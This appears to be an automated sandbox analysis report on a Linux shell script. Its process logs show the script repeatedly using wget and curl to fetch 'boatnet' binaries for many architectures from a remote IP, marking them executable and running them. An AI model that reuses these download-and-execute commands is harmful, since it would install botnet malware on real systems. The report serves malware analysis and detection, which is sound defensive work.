Analysis Overview
SHA256
9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b
Threat Level: Shows suspicious behavior
The file 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh was found to show suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-29 02:44
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-29 02:44
Reported
2024-10-29 02:47
Platform
debian9-mipsel-20240611-en
Max time kernel
49s
Max time network
52s
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target | Count |
| N/A | N/A | /bin/chmod | N/A | 15 |
Executes dropped EXE
| Description | Indicator | Process | Target | Count |
| N/A | /tmp/WTF | /tmp/WTF | N/A | 15 |
Reads runtime system information
| Description | Indicator | Process | Target | Count |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A | 15 |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/WTF | /tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh | N/A |
Processes
/tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh
[/tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.x86]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.x86]
/bin/cat
[cat boatnet.x86]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-f1157ac62e6a4958903a4b5c28c532fa-systemd-timedated.service-HVn6fY WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.mips]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.mips]
/bin/cat
[cat boatnet.mips]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-f1157ac62e6a4958903a4b5c28c532fa-systemd-timedated.service-HVn6fY WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.arc]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arc]
/bin/cat
[cat boatnet.arc]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-f1157ac62e6a4958903a4b5c28c532fa-systemd-timedated.service-HVn6fY WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.i468]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.i468]
/bin/cat
[cat boatnet.i468]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-f1157ac62e6a4958903a4b5c28c532fa-systemd-timedated.service-HVn6fY WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.i686]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.i686]
/bin/cat
[cat boatnet.i686]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-f1157ac62e6a4958903a4b5c28c532fa-systemd-timedated.service-HVn6fY WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.x86_64]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.x86_64]
/bin/cat
[cat boatnet.x86_64]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-f1157ac62e6a4958903a4b5c28c532fa-systemd-timedated.service-HVn6fY WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.mpsl]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.mpsl]
/bin/cat
[cat boatnet.mpsl]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-f1157ac62e6a4958903a4b5c28c532fa-systemd-timedated.service-HVn6fY WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm]
/bin/cat
[cat boatnet.arm]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-f1157ac62e6a4958903a4b5c28c532fa-systemd-timedated.service-HVn6fY WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm5]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm5]
/bin/cat
[cat boatnet.arm5]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-f1157ac62e6a4958903a4b5c28c532fa-systemd-timedated.service-HVn6fY WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm6]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm6]
/bin/cat
[cat boatnet.arm6]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm7]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm7]
/bin/cat
[cat boatnet.arm7]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.ppc]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.ppc]
/bin/cat
[cat boatnet.ppc]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.spc]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.spc]
/bin/cat
[cat boatnet.spc]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.m68k]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.m68k]
/bin/cat
[cat boatnet.m68k]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.sh4]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.sh4]
/bin/cat
[cat boatnet.sh4]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]
/tmp/WTF
[./WTF]
Network
| Country | Destination | Domain | Proto | Count |
| US | 154.216.19.166:3000 | | tcp | 30 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-29 02:44
Reported
2024-10-29 02:47
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
28s
Max time network
131s
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target | Count |
| N/A | N/A | /bin/chmod | N/A | 15 |
Executes dropped EXE
| Description | Indicator | Process | Target | Count |
| N/A | /tmp/WTF | /tmp/WTF | N/A | 15 |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/WTF | /tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh | N/A |
Processes
/tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh
[/tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.x86]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.x86]
/bin/cat
[cat boatnet.x86]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.mips]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.mips]
/bin/cat
[cat boatnet.mips]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.arc]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arc]
/bin/cat
[cat boatnet.arc]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.i468]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.i468]
/bin/cat
[cat boatnet.i468]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.i686]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.i686]
/bin/cat
[cat boatnet.i686]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.x86_64]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.x86_64]
/bin/cat
[cat boatnet.x86_64]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.mpsl]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.mpsl]
/bin/cat
[cat boatnet.mpsl]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm]
/bin/cat
[cat boatnet.arm]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm5]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm5]
/bin/cat
[cat boatnet.arm5]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm6]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm6]
/bin/cat
[cat boatnet.arm6]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm7]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm7]
/bin/cat
[cat boatnet.arm7]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.ppc]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.ppc]
/bin/cat
[cat boatnet.ppc]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.spc]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.spc]
/bin/cat
[cat boatnet.spc]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.m68k]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.m68k]
/bin/cat
[cat boatnet.m68k]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.sh4]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.sh4]
/bin/cat
[cat boatnet.sh4]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh config-err-Y1Vltx netplan_rar_235w snap-private-tmp ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-om3Vr2 WTF]
/tmp/WTF
[./WTF]
Network
| Country | Destination | Domain | Proto | Count |
| N/A | 224.0.0.251:5353 | | udp | 1 |
| US | 154.216.19.166:3000 | | tcp | 30 |
| GB | 185.125.188.61:443 | | tcp | 2 |
| US | 151.101.1.91:443 | | tcp | 2 |
| GB | 89.187.167.7:443 | | tcp | 1 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-29 02:44
Reported
2024-10-29 02:48
Platform
debian9-armhf-20240611-en
Max time kernel
24s
Max time network
51s
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target | Count |
| N/A | N/A | /bin/chmod | N/A | 15 |
Executes dropped EXE
| Description | Indicator | Process | Target | Count |
| N/A | /tmp/WTF | /tmp/WTF | N/A | 15 |
Checks CPU configuration
| Description | Indicator | Process | Target | Count |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A | 15 |
Reads runtime system information
| Description | Indicator | Process | Target | Count |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A | 15 |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A | 15 |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/WTF | /tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh | N/A |
Processes
/tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh
[/tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.x86]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.x86]
/bin/cat
[cat boatnet.x86]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.mips]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.mips]
/bin/cat
[cat boatnet.mips]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.arc]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arc]
/bin/cat
[cat boatnet.arc]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.i468]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.i468]
/bin/cat
[cat boatnet.i468]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.i686]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.i686]
/bin/cat
[cat boatnet.i686]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.x86_64]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.x86_64]
/bin/cat
[cat boatnet.x86_64]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.mpsl]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.mpsl]
/bin/cat
[cat boatnet.mpsl]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm]
/bin/cat
[cat boatnet.arm]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm5]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm5]
/bin/cat
[cat boatnet.arm5]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm6]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm6]
/bin/cat
[cat boatnet.arm6]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm7]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm7]
/bin/cat
[cat boatnet.arm7]
/bin/chmod
